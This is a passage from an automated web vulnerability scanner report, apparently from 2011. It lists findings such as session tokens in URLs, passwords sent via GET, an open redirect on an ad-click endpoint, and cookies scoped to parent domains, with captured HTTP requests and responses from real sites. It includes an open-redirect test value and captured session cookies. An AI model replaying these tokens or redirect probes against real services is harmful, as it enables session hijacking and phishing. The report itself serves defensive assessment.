Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="passedStep">
<a href="/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=HOSTING_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea">Select Application</a>
...[SNIP]...
<td class="OrderRowTD" align="left" valign="top">

<a href="/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&act=remove&oitem=0" onclick="return confirmRemove();" class="IconRemove">Remove </a>
...[SNIP]...

9.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=155079171186702&app_id=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143a1bc3%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12abf4cdc%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d7959e18%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25479d134%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bfa62428%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.59
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.

10. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...

11. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//ad26a94a492587d18/a%3fhttp%3a//ad.doubleclick.net/click%3bh%3dv8/3b30/2/0/*/a%3b241822308%3b0-0%3b0%3b64413316%3b933-120/600%3b42361883/42379670/1%3b%3b~sscs%3d%3fhttp%3a//www.celebritycruises.com/specials/viewHTMLPromo.do%3fpagename%3dEuropePromotions%26cS%3dvanity%26vanity%3dEuropePromotion%26cid%3ddi_pgr_0601_dr11q2eu_1106_sky was submitted in the adurl parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /pagead/aclk?sa=L&ai=BfELNjo8ETsG2FKP7lQesrNm2AceTxJcC76KQhyXAjbcBkN-hARABGAEgwcvRHjgAUJeRzKP______wFgydbyhsij_BqgAbeJ--kDsgEVd3d3LnBodWtldC10cmF2ZWwuY29tugEKMTIweDYwMF9hc8gBCdoBHWh0dHA6Ly93d3cucGh1a2V0LXRyYXZlbC5jb20vuAIYyAKvtZQaqAMB0QPgy9uX8AkKYegD7AfoA7Mt6AOzAegDzSfoA0P1AwAAAMQ&num=1&client=ca-pub-4422256122899399&val=ChAwY2E0MmQ4MTM3MDAwMGIzEM-pue4EGgjtg8uujvUQZyABKAE&sig=AGiWqtztk8LXvH-0DC-TiBn8CX7Ajzkjeg&adurl=http%3a//ad26a94a492587d18/a%3fhttp%3a//ad.doubleclick.net/click%3bh%3dv8/3b30/2/0/*/a%3b241822308%3b0-0%3b0%3b64413316%3b933-120/600%3b42361883/42379670/1%3b%3b~sscs%3d%3fhttp%3a//www.celebritycruises.com/specials/viewHTMLPromo.do%3fpagename%3dEuropePromotions%26cS%3dvanity%26vanity%3dEuropePromotion%26cid%3ddi_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoQCQmZFTE5qbzhFVHNHMkZLUDdsUWVzck5tMkFjZVR4SmNDNzZLUWh5WEFqYmNCa04taEFSQUJHQUVnd2N2UkhqZ0FVSmVSektQX19fX19fd0ZneWRieWhzaWpfQnFnQWJlSi0ta0RzZ0VWZDNkM0xuQm9kV3RsZEMxMGNtRjJaV3d1WTI5dHVnRUtNVEl3ZURZd01GOWhjOGdCQ2RvQkhXaDBkSEE2THk5M2QzY3VjR2gxYTJWMExYUnlZWFpsYkM1amIyMHZ1QUlZeUFLdnRaUWFxQU1CMFFQZ3k5dVg4QWtLWWVnRDdBZm9BN010NkFPekFlZ0R6U2ZvQTBQMUF3QUFBTVESEwj2_Mm30s6pAhUMO-UKHWAtgzoYASDq7I662qL18TNIAQ; expires=Sun, 24-Jul-2011 13:26:41 GMT; path=/pagead/conversion/1027523767/
Cache-Control: private
Location: http://ad26a94a492587d18/a?http://ad.doubleclick.net/click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:26:41 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


12. Cookie scoped to parent domain  previous  next
There are 50 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=83986945579028480&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15234657 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.1.10.1308923300; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--fae0483a5842011ad9a0222333fac5dc436bfe1e

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923391-40028-23588
X-RateLimit-Limit: 1000
ETag: "863510bfd05f46bc05fb758008ea14f6"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:49:51 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.05064
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 543ba3d8776a2596391f065315b725309d146be2
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIhpodHRwOi8vdHdpdHRlci5jb20vZWE6D2Ny%250AZWF0ZWRfYXRsKwiug%252BjBMAE%253D--fae0483a5842011ad9a0222333fac5dc436bfe1e; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4498
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

12.2. http://api.twitter.com/1/urls/resolve.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/urls/resolve.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKRS&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oKy4&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofOD&urls%5B%5D=http%3A%2F%2Fow.ly%2F5ofnG&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oflE&urls%5B%5D=http%3A%2F%2Fow.ly%2F5of3j&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeXg&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oeNB&urls%5B%5D=http%3A%2F%2Fow.ly%2F5oa4Y&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o5k9&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4YM&urls%5B%5D=http%3A%2F%2Fow.ly%2F5o4Jj&urls%5B%5D=http%3A%2F%2Fbit.ly%2Fl0x4zn HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130796296639680752; k=173.193.214.243.1308571866345827; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; __utmc=43838368; __utmb=43838368.2.10.1308923300; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1308923447-17753-60906
X-RateLimit-Limit: 1000
ETag: "62bd892d49144959eee88efaaacc609a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Fri, 24 Jun 2011 13:50:47 GMT
X-RateLimit-Remaining: 955
X-Runtime: 0.01192
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114508b243d
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4574163279f6bcccd0daeaf1111869debe1ca4fd
X-RateLimit-Reset: 1308926900
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzY5MDg2MWJhZjViMjAyZGY4MDc2MDk3ZmNlMmEy%250AYjM6B2lkIiU0YjQyNTEzMzMyYTE4ODU0YjQxYTk3Yjk2ZTM4OWU1ZCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vYXNrZWFz%250AdXBwb3J0Og9jcmVhdGVkX2F0bCsIroPowTAB--53c908b5ac5e9523bb449b7c77acdfe7d28a8eac; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 945
Connection: close

{"http:\/\/ow.ly\/5of3j":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5o4YM":"http:\/\/support.ea.com\/","http:\/\/ow.ly\/5oflE":"http:\/\/support.eamobile.com\/","http:\/\/ow.ly\/5o4Jj":"http:\/\/sup
...[SNIP]...

12.3. http://www.ea.com/dynajs/gus.jsx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ea.com
Path:   /dynajs/gus.jsx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynajs/gus.jsx HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 File Not Found
Date: Fri, 24 Jun 2011 13:43:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; path=/; domain=.ea.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html


12.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

12.5. http://a.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cyyg8%2BAquYajlyU38mbKfM6zzAAi91YoxCASmOO%2F6vslaz3Wz6SAb7WNSoJ42tqPjZBZm%2BwU7nz%2BqSaZkPum3%2BCcVtWs4kWprLiUT69hq%2BB7egueH9fmWFooawy%2FIlN07%2FywLbqigg1lXylCtaXnEdSXrSN%2BG6wl4qKM0pyjpXM7wDjjF%2FTnaw27LAO86PDR8rVQBsHkjHYPXkvQDaVu1cNDOjedkku9rP5M4aXEKwkdj4GS5v130Su5DukdLRdsllQxY%2B7lxFgDjvyHHxdnOJN0dE%2F4NbWDBdda3%2BTZ9xk2kRE4siiSl%2FES6mcPHsh5QYNe%2B3r%2BixhOSblhWvWuhng4yHSIxh%2FdseAuHpAB4bgzwOQgOQtu6mRAPuh3ZeeWE4ftB5QnNagzzBV6tjFj2Gx16lEDbzzYwMXeK3q5f6XdSiNsf7FIJww9fjsd4IIexvm8cX3okZybYL6im77R%2Fm6D%2Biy0lxPC8bFKQsAI777CENYtplCK92RelBIxTakV2KZ9zjQZSBLVArtq%2Bd3A8brImrUXwY47CZCPMyU3E7HGBv5tRNsvK5locqtXgvWrgSFbQU%2FS7P2yi6Tu5HqAksMuAf7uFBpCtKBX0SbhRUzjxprR%2Bdzt3S5q1OPrunUWDaTyE%2FfH2xdVd9zwp8epdDU3YBru1Z4Bpl9GYvlnLLFyLJgKqp%2F2hzCYMa%2BYiQ0ZuhV1QwKhaQNvGQTe6134KX2JdCP%2BuD8wI%2FlVlbm5EPzEufUaBJmtDn8HMCishvBcS

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:58 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 23 Jun 2011 02:10:58 GMT
Last-Modified: Thu, 23 Jun 2011 02:10:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CcUXouB4rLUo4z%2FFKqv9TTqetSZc6URjOUkrEwZxL19iFoM3B6TaCLVGSPl4YcBy8M5VAiHvrOT0p0MJYOkmTpDIOg2x6eeiUsYim2C5zms%2BvrRLQn%2FoybFZANl57jMSeqLSZr0cDlofYcqgbyhV3RKv1yXyCctLJPQejPFuG%2FSTaq20qktFEGeqalakL5cpnxnT9tbUjhJLDFmel2Kl7C%2B5z4szEshst11JdDKJH9eq%2BoqpkDMROMNvFjfMDpfNItKW%2FvjCiL3RPcp47TxOLhJ1Q2YxLnIEZhyzUPf2LGOE6tEXu99zJEid0dKnMpG%2Bt9tIdB8UM95tAZHMW4LcN96ZflsymOkOyFv%2F1NsyGKFpkir%2Bjuwdzi7qcC%2FUA0hVVE9G7U9zUMou5%2Bbc2a66HREcxgoJ%2BDYN1%2Bhl0najue0Mcc2UFyncDi8SA02XiMCyX0QJt1ZGMqincsgjg4PvOacguI41%2FRN9FLR0lJOwU0vGk7GnXdTKda3JAzbk22zhYUV2US7JJuCxrTdVyzrTwrXTOQRiQNUhR79O7q641BJrqJ1WoKm3ej57gnXAZz6Ea6eF4VqJJZafHUjoVvCR4%2FzbKbaCZ6W6F2FV54q3JzisnJLOIeRfLB8wzZ2Yl%2Bvao5sI%2BQsCZtivHP%2BZMXU4rAiUKToqmTb9NqrSxuxywPEfo2vtC%2FlqOA09MEIfqXMW%2Bzo1PK9bgH7HezrWA467f7Y0maS7n%2FbXXPRcfp3kGW0ejb6ZBA%2B2%2F1ebBdFEbxJtE; expires=Sun, 25-Dec-2011 